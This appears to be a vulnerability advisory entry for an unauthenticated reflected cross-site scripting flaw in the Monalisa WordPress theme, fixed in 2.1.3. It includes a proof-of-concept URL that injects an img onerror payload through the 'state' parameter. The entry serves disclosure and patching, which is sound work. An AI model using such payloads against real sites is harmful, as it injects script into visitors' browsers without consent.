Themes Vulnerabilities

Monalisa < 2.1.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

An Unauthenticated Reflected XSS vulnerability was discovered in the Monalisa theme through 2.1.2 for WordPress.

Proof of Concept

https://example.com/reservation/?state=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(`XSS`);%3E

Affects Themes

Fixed in 2.1.3

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Vlad Vector
Submitter
VLΛD VΞCTOR
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2020-07-08 (about 3 years ago)
Added
2020-07-08 (about 3 years ago)
Last Updated
2020-07-09 (about 3 years ago)

Other